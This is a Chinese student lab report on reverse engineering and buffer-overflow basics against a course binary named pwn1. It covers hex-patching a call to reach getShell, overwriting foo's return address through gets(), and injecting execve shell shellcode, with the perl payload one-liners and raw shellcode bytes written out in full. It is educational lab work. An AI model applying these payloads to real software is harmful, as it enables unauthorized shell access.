20171113曾英特《逆向及Bof基础实践》实验报告
一、实验名称
逆向及Bof基础实践
二、实验目的
1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
2.掌握反汇编与十六进制编程器
3.能正确修改机器指令改变程序执行流程
4.能正确构造payload进行bof攻击
三、实验内容
本次实验的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。该程序同时包含另一个代码片段getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。
本次实验的三个实践内容如下:
(1)手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
(2)利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
(3)注入一个自己制作的shellcode并运行这段shellcode。
这几种思路,基本代表现实情况中的攻击目标:
(1)运行原本不可访问的代码片段
(2)强行修改程序执行流
(3)注入运行任意代码。
四、基础知识与实验准备
1.部分汇编指令极其对应的机器码
(1)NOP :空操作,机器码0x90
(2)JNE :条件转移指令,不相等则跳转,机器码0x75
(3)JE :条件转移指令,相等则跳转,机器码0x74
(4)JMP :无条件跳转
段内直接短转Jmp short,机器码0xeb;
段内直接近转移Jmp near,机器码0xe9;
段内间接转移Jmp word,机器码0xff;
段间直接(远)转移Jmp far,机器码0xea
(5)CMP :比较指令,相当于减法,可以改变标志位,不保存结果
2.安装所需的软件包
sudo apt-get update
sudo apt-get install execstack //安装execstack
sudo apt-get install gdb //安装gdb
3.Linux下有两种基本构造攻击buf的方法:
(1)retaddr+nop+shellcode
(2)nop+shellcode+retaddr
多选用第一种方法(RNS)。
五、实验步骤
5.1直接修改程序机器指令,改变程序执行流程
(1)将pwn1复制到虚拟机的/home/zyt20171113目录下,并备份一个pwn2。
(2)使用objdump -d pwn1 | more对pwn1反汇编,其中“-d”为disassemble反汇编之意,“|”为管道服务,意为把pwn1反汇编的结果作为more的输入。
(3)输入“/getShell”,直接找到getShel函数、foo函数和main函数的反汇编结果。
当程序正常执行到“call 8048491 <foo>”时,意为这条指令将调用foo函数,而foo函数的地址在上图我们可以看到时8048491,与指令相符。对应的机器指令中的e8即跳转之意,我们要做的就是把这条指令的跳转地址从8048491的foo函数改为804847d的getShell函数,从而实现通过直接修改程序机器指令,改变程序执行流程的目的。此时EIP寄存器中的值应该是下条指令的地址,即80484ba,当执行call指令的时候,CPU会执行“EIP+call后面的地址(此处为d7ffffff)”所在位置的指令(其中d7ffffff是补码),所以要想执行getShell函数,只要call X满足“EIP+X=804847d”即可。用计算器计算得到X为c3ffffff。
(4)使用vi文本编辑器,vi 打开文件后就直接进入一般模式,在一般模式中可以进行删除、复制、粘贴等动作,但是却无法编辑文件内容,按“r”会进入编辑模式,可以修改文件内容,编辑模式下按Esc键可退回一般模式。刚开始打开pwn1会显示乱码,输入“:%!xxd” 将显示模式切换为16进制模式。输入“/d7”找到要修改的地方,确认位置正确后,按“r”将d7改为c3,输入“:%!xxd -r” 将显示转换回原格式,最后输入“:wq”存盘退出。
(5)再次反汇编,观察到call指令调用了getShell函数。
5.2通过构造输入参数,造成BOF攻击,改变程序执行流
(1)输入“cp pwn2 pwn1”恢复原pwn1文件
(2)对pwn1反汇编,按程序正常执行顺序,main函数会调用foo函数,foo函数会简单回显任何用户输入的字符串,因为foo函数调用了gets函数,不会检查用户输入字符串的长度,所以有缓冲区溢出攻击漏洞,我们可以利用输入的字符串,覆盖foo函数的返回地址(即main栈帧中的EIP),使程序执行getShell函数。观察到foo函数反汇编的结果,由“lea -0x1c(%ebp),%eax”发现foo函数的缓冲区长度是0x1c(即十进制28个字节),加上堆栈中存放main函数的ebp地址所占的4个字节,共32个字节。
使用gdb工具调试pwn1,根据上图中eip寄存器的值0x34333231确定输入字符串的第33、34、35、36个字符会覆盖到堆栈上的返回地址。
(3)由以上的分析,只要我们在输入字符串的第33-36字节设为getShell函数的地址0x0804847d,即可在程序返回时跳转到getShell函数。对比上一次输入1234得到的返回地址为0x34333231,所以我们0x0804847d的输入顺序应为\x7d\x84\x04\x08。
构造的字符串为11111111222222223333333344444444\x7d\x84\x04\x08。由于键盘无法输入16进制值,所以我们先用perl指令生成包括这样字符串的一个文件。输入“perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input”,使用输出重定向“>”将perl生成的字符串存储到文件input中,并使用16进制查看指令xxd查看input文件的内容。
(4)输入“(cat input; cat) | ./pwn1”,即通过管道服务,读出文件input的内容并将其作为pwn1的输入,程序执行到getShell函数,得到一个可用Shell。
5.3注入Shellcode并执行
(1)做好准备工作:设置堆栈可执行,关闭地址随机化,使攻击环境比较理想。
(2)Linux下有两种基本构造攻击buf的方法:
·retaddr+nop+shellcode
·nop+shellcode+retaddr。
这两种方法我都进行了尝试,但是通过尝试,发现nop+shellcode+retaddr的构造无法成功实现执行shellcode,我觉得可能是因为执行完汇编语言的leave指令(leave为mov %ebp, %esp + pop %ebp)后,esp寄存器的值为ebp寄存器的值,即系统收回该ebp和原esp之间的地址空间,而nop+shellcode+retaddr的构造就是将shellcode的代码部分放在被回收的那段地址空间中,导致无法执行shellcode。但是我在单步调试的过程中却发现,即使执行完leave指令后,shellcode的代码也暂时不会消失,直到运行至0xffffd352时才会出错,这也是我不太理解的地方。
输入“(cat input_shellcode;cat) | ./pwn1”后在另一个终端打开调试界面,找到foo栈帧中的返回地址。输入“ps -ef | grep pwn1”找到pwn1的进程号为1199,再使用gdb工具调试pwn1,输入“disassemble foo”对foo函数反汇编,将断点放在ret(即pop %eip)之前。回原终端按下回车(即字符串输入结束),再回来输入c继续执行。使用“info r esp”查看esp寄存器的地址为0xffffd35c,再往前翻一翻,找到若干0x90(nop)即可。确定空操作的地址后,将地址换至input_shellcode文件中。
调用出错后重复上述步骤进行单步调试,尝试找出错误的原因(已在上文中提及)。
一开始shellcode的代码段是完整的,但执行到0xffffd352后,shellcode的代码就丢失了一部分,随后程序出错结束。
· 此处结构为retaddr+nop+shellcode
坑跳完之后,选用retaddr+nop+shellcode构造重新开始。因为设置了关闭地址随机化,所以返回地址没有改变,仍为0xffffd35c,所以它的下一个地址(0xffffd360)会存放nop指令。输入“perl -e 'print "A" x 32;print "\x60\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode”,设计好字符串并将其放入input_shellcode文件中。使用xxd查看input_shellcode文件中的内容是否如预期所示。
(3)最后输入“(cat input_shellcode;cat) | ./pwn1”,将input_shellcode文件的内容作为pwn1的输入,成功实现了调用注入的shellcode。
六、问答题
什么是漏洞?漏洞有什么危害?
答:漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。
漏洞的存在,很容易导致黑客的侵入及病毒的驻留,会导致数据丢失和篡改、隐私泄露乃至金钱上的损失,如:网站因漏洞被入侵,网站用户数据将会泄露或被篡改、网站功能可能遭到破坏而中止乃至服务器本身被入侵者控制。
七、实验收获与感想
通过本次网络对抗技术实验,我实现了手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数,利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数以及注入一个自己制作的shellcode并运行这段shellcode。因为是首次做网络对抗实验,所以本次实验我主要是观看老师的教学视频,跟着老师的步骤,一步一步完成的,通过理解老师所讲的汇编语言、机器指令和栈帧的相关知识,明白缓冲区溢出攻击的原理,最后尝试抛开指导,用所学到的知识独立完成实验。
本次实验让我受益匪浅,期待下次实验能让我对这门课程有更深的理解和感悟。